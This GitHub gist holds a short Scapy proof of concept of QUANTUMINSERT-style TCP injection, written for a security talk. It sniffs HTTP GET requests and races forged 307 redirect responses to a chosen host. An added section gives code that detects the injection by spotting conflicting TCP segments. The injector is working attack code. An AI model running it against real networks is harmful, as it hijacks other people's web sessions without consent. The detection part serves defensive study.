Gist jpouellet/ac93c7644ea88ad64e11, created March 18, 2015 06:03
Ghetto QUANTUMINSERT with Scapy.
FOXACID = 'www.openbsd.org'
def QUANTUMINSERT(p):
    p.show()
    if Raw in p and p['Raw'].load.startswith('GET /') and p['Raw'].load.endswith('\r\n\r\n'):
        ip = IP(flags='DF', src=p['IP'].dst, dst=p['IP'].src)
        tcp = TCP(sport=p['TCP'].dport, dport=p['TCP'].sport, flags='PA', seq=p['TCP'].ack, ack=p['TCP'].seq + len(p['Raw'].load))
        http = 'HTTP/1.1 307 Temporary Redirect\r\nLocation: http://'+FOXACID+'/\r\nConnection: close\r\n\r\n'
        out = ip / tcp / http
        print '[*OUT*]'
        out.show()
        print 'sending...'
        send(out)
    p
# TURMOIL?
suckers = sniff(filter='tcp port http and host not '+FOXACID, prn=QUANTUMINSERT)
# Warning: May cause infinite FIN/FIN-ACK loop, but gets the job done regardless.
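Detection side, as an added example that is not part of the original gist: the forged response above uses `seq=p['TCP'].ack`, the same sequence number the real server's reply will start at, so a monitor on the client side sees two segments covering the same sequence range with different bytes. The sketch below flags that condition over already-parsed segment records; the record layout, the addresses and the sample payloads are constructed for illustration, and sequence-number wraparound is ignored.

```python
from collections import defaultdict

def find_conflicting_segments(segments):
    """segments: iterable of (src, sport, dst, dport, seq, payload_bytes).

    Returns a list of (flow, seq_of_overlap, first_payload, later_payload) for
    every segment whose bytes disagree with data already seen for the same
    sequence range of the same one-directional flow. An identical
    retransmission is not reported.
    """
    seen = defaultdict(list)   # flow -> [(seq, payload), ...]
    alerts = []
    for src, sport, dst, dport, seq, payload in segments:
        if not payload:
            continue           # pure ACK/FIN/SYN carry no data to compare
        flow = (src, sport, dst, dport)
        for old_seq, old in seen[flow]:
            start = max(seq, old_seq)
            end = min(seq + len(payload), old_seq + len(old))
            if start < end and (payload[start - seq:end - seq]
                                != old[start - old_seq:end - old_seq]):
                alerts.append((flow, start, old, payload))
                break
        else:
            seen[flow].append((seq, payload))
    return alerts

# Constructed sample traffic (documentation addresses, made-up payloads).
SERVER = ("203.0.113.10", 80, "198.51.100.7", 51000)
OTHER = ("203.0.113.20", 80, "198.51.100.7", 51001)
FORGED = (b"HTTP/1.1 307 Temporary Redirect\r\n"
          b"Location: http://redirect.example/\r\nConnection: close\r\n\r\n")
GENUINE = b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello"
SAMPLE = [
    SERVER + (1000, FORGED),                 # arrives first, wins the race
    SERVER + (1000, GENUINE),                # real reply, same seq, other bytes
    OTHER + (5000, GENUINE),                 # unrelated flow
    OTHER + (5000, GENUINE),                 # identical retransmission: benign
    OTHER + (5000 + len(GENUINE), b"more"),  # next in-order segment: benign
]

if __name__ == "__main__":
    for flow, seq, first, later in find_conflicting_segments(SAMPLE):
        print("conflicting data at seq %d on %s:%d -> %s:%d" % ((seq,) + flow))
        print("  first seen:", first[:32])
        print("  later seen:", later[:32])
```
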
If somebody wants to improve this to properly terminate the connection, then be my guest. It was written at 4am as a proof-of-concept demo for a VTCSEC talk the next day.